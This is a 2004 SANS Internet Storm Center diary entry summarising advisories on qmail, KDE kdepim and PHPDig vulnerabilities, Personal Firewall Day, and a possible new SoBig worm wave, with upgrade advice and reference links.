Threat Level: green Handler on Duty: Rob VandenBrink

SANS ISC InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Possible Qmail Vulnerability / KDE vulnerability / New SoBig wave ?/ and more...

Published: 2004-01-15
Last Updated: 2004-01-16 15:19:57 UTC
by Pedro Bueno (Version: 1)
0 comment(s)
Possible Qmail vulnerability


In a earlier post at FD list, a security advisory by George Guniski explains about a possible Qmail vulnerability.
According the advisory, there are two main problems:

"a) It is possible to crash qmail-smtpd 1.03 from remote with a long SMTP session. The crash is not global, it affects only the current SMTP session.

b) If gdb is to be believed, it is possible to overwrite memory in qmail-smtpd 1.03 from remote with a long SMTP session."

An exploit was also posted.
Although there is no real evidence of the effectiveness of this exploit, users are advised to keep the qmail version up-to-date. Qmail website doesnt show any new version, and a discussion about this bug in the Qmail mailing list doenst show any conclusion yet.

References: http://www.guninski.com/qmailcrash.html

http://www.qmail.org



KDE Vulnerability


KDE released an Security Advisory about a potential
vulnerability in its kdepim application.
Kdepim versions distributed in KDE 3.1.0 through 3.1.4 are
vulnerable to a buffer overflow attack.

According the Security Advisory, the CVE has assigned the
name CAN-2003-0988 to this issue.

The impact of this vulnerability is that local attackers
can execute commands with the victim's privileges. If
information reading is allowed to remote users (not the
default), remote attackers can also take advantage of this
vulnerability.

Users are advised to upgrade to KDE 3.1.5. A patch is also
available for KDE 3.1.4 users.

Reference: http://www.kde.org/info/security/advisory-20040114-1.txt



PHPDig Vulnerability


PHPDig is a search/spider engine written in PHP.
Kernelpanik.org released a security advisory about a remote
execution vulnerability in PHPDig 1.6.x .

The workarounds, according the advisory are the usage
of .htaccess in ./include, PHP globals off (which is
default in PHP > 4.2) and an unofficial patch for
config.php available in http://www.kernelpanik.org .

Users are advised to take extreme care with all patches
that are not offically released by the Vendor.

Reference: http://www.kernelpanik.org



Personal Firewall Day


An advisory published in various security mailing lists,
about January 15 to be the Personal Firewall Day. A website
was also created for the purpose of educating users to make
use of personal firewalls.

Reference: http://www.personalfirewallday.org/



New SoBig wave?


Some users are describing some new SoBig wave.

A quick look at Postini and TrendMicro's tracking sites show that SoBig maybe coming back.

Yesterday Postini had it as #8 and Trend had it as #10.
Today
Postini has it as #6 and Trend has it as #2 worldwide and #1 for North
America.


References:

http://www.trendmicro.com/map/

http://www.postini.com/stats/

Yesterday (15/01) they both reported around 1,000 today Trend has it at over 10000 and Postini is over 7000.

If you are observing these, please contact us.

Thanks to Deb Hale for the reference numbers.

-------------------------------------

Handler on duty: Pedro Bueno
Keywords:
0 comment(s)
Diary Archives